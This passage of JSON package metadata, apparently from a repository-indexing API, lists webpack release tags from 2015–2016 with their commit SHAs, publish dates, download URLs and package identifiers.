-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind"